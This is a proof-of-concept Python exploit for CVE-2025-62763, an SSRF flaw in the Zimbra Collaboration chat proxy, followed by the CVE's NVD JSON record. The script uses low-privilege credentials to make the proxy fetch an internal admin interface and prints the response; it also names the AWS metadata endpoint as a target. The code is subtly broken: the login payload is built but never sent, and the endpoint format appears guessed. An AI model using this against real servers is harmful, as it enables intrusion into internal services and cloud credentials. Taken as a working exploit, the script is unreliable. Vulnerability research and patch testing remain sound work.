CVE-2025-62763

# CVE-2025-62763 - Zimbra Collaboration Chat Proxy SSRF PoC # This PoC demonstrates the SSRF vulnerability through Zimbra's chat proxy configuration import requests # Configuration TARGET = "https://target-zimbra-server.com" USERNAME = "[email protected]" PASSWORD = "user_password" INTERNAL_TARGET = "http://127.0.0.1:8080/admin" # Internal admin interface METADATA_URL = "http://169.254.169.254/latest/meta-data/" # AWS metadata def exploit_ssrf(): """ Exploit SSRF via Zimbra chat proxy misconfiguration. The chat proxy fails to validate the destination URL, allowing authenticated users to redirect requests to arbitrary URLs. """ session = requests.Session() # Step 1: Authenticate to Zimbra with low-privilege credentials login_url = f"{TARGET}/service/soap/auth" auth_payload = { "Body": { "AuthRequest": { "_jsns": "urn:zimbraAccount", "account": { "_content": USERNAME, "by": "name" }, "password": { "_content": PASSWORD } } } } # Step 2: Use the chat proxy endpoint to trigger SSRF # The chat proxy forwards requests without proper URL validation chat_proxy_url = f"{TARGET}/service/chat/proxy" # Craft SSRF payload targeting internal services or cloud metadata ssrf_payload = { "target": INTERNAL_TARGET, # Arbitrary URL the proxy will fetch "method": "GET" } # Step 3: Send the malicious request through chat proxy response = session.post( chat_proxy_url, json=ssrf_payload, headers={"Content-Type": "application/json"} ) # Step 4: Analyze response for internal information leakage if response.status_code == 200: print(f"[+] SSRF successful!") print(f"[+] Response from {INTERNAL_TARGET}:") print(response.text[:500]) return response.text else: print(f"[-] Request failed with status: {response.status_code}") return None if __name__ == "__main__": print("[*] CVE-2025-62763 - Zimbra Chat Proxy SSRF") print("[*] Testing SSRF via chat proxy misconfiguration...") result = exploit_ssrf() if result: print("[+] Internal service content retrieved successfully")

{"cve": {"id": "CVE-2025-62763", "sourceIdentifier": "[email protected]", "published": "2025-10-21T17:15:41.357", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Zimbra Collaboration (ZCS) before 10.1.12 allows SSRF because of the configuration of the chat proxy."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://blog.zimbra.com/2025/10/patch-release-update-zimbra-10-1-12/", "source": "[email protected]"}, {"url": "https://wiki.zimbra.com/wiki/Security_Center", "source": "[email protected]"}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.12", "source": "[email protected]"}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Releases/10.1.12#Security_Fixes", "source": "[email protected]"}, {"url": "https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories", "source": "[email protected]"}]}}